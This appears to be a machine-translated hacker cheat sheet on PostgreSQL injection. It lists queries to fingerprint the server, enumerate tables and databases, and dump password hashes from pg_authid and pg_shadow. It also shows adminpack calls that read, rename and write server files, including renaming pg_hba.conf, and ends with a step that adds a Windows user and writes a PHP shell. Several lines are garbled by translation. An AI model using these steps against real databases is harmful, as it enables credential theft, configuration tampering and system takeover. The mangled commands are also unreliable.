PostGreSQL injection Learning (continued)

/* Author: b4che10r record the source, thx */

Select version () Determine version
Select current_database (); current database
Select session_user/current_user; Session user
Inet_server_addr (); ip address of the Database Server
Inet_server_port (); port of the Database Server
Pg_stat_user_tables attempts to store all the table names in the system. The key field relname can be read from the first table name using select relname from pg_stat_user_tables limit 1 offset 0.
Select column_name from information_schema.columns where table_name = xxx limit 1 offset n to read the fields of each table name. (The information_schema mode is not deleted)
Certificate -------------------------------------------------------------------------------------------------------------------------------------------------------------------
Select relname from pg_stat_user_tables limit 1 offset n/* to obtain user tables one by one */
Select oid from pg_class where relname = xxx/* to get the oid value of the table named xxx, which is assumed to be 16402 */
Select attname from pg_attribute where attrelid = 16402 limit 1 offset 6/* the first six in the local test are built-in systems, which are tableoid, cmax, xmax, cmin, xmin, ctid */
Select attname from pg_attribute where attrelid = (select oid from pg_class where relname = (select relname from pg_stat_user_tables limit 1 offset 2 )) limit 1 offset 6)
Certificate ---------------------------------------------------------------------------------------------------------------------------------------------------------------------
Select rolname, rolpassword from pg_authid; get the username and hash (postgres user permission is required)
Select usename, passwd from pg_shadow; Same as above
Certificate ----------------------------------------------------------------------------------------------------------------------------------------------------------------------
Select datname from pg_database limit 1 offset n; obtain the names of all databases on the database server
Select datname from pg_stat_database limit 1 offset n; Same as above
Certificate ---------------------------------------------------------------------------------------------------------------------------------------------------------------------
The pg_logdir_ls (), pg_ls_dir (), pg_file_rename (), pg_file_write (), pg_file_read (), and pg_file_length () functions in the adminpack are all limited .. /postgresql/data Directory (the reason why the directory does not have permissions was mentioned in the article in February 30 is that the functions are restricted to the data directory)

Pg_logdir_ls (): select pg_logdir_ls (); column ../postgresql/data/pg_log/directory

Pg_file_read (text, bigint, bigint): select pg_file_read (pg_cmd.conf, 1, pg_file_length (pg_hb.conf); read contents of ../postgresql/data/pg_cmd.conf


Select pg_ls_dir (text): select pg_ls_dir (pg_log/); column ../postgresql/data/pg_log/directory

Select pg_file_rename (pg_hba.conf, fuck. conf); change the pg_hba.conf file name to fuck. conf.

Select pg_file_write(fuck.txt, postgresql, true); in this way, create a new fuck.txt in the./postgresql/datadirectory with the content of postgresql

Select <? Php phpinfo () ;?>; In g 1. php, 1. php is written in the ../postgresql/script/directory.
Certificate ---------------------------------------------------------------------------------------------------------------------------------------------
Run after logging on to pgsql! Net user killer 123123/add so that you can add a user, that is, you can execute the system command, select! ^ <? Php phpinfo ();? ^ >>> C: \ 1.php can write a shell in drive c.

Bytes --------------------------------------------------------------------------------------------------------------
Psql cross-database query currently does not have any way to break through. Cross-database query can be performed only when you log on to SQL shell and the user has the permission.


Ps: I'm waiting for b4 to write the py self-injection code.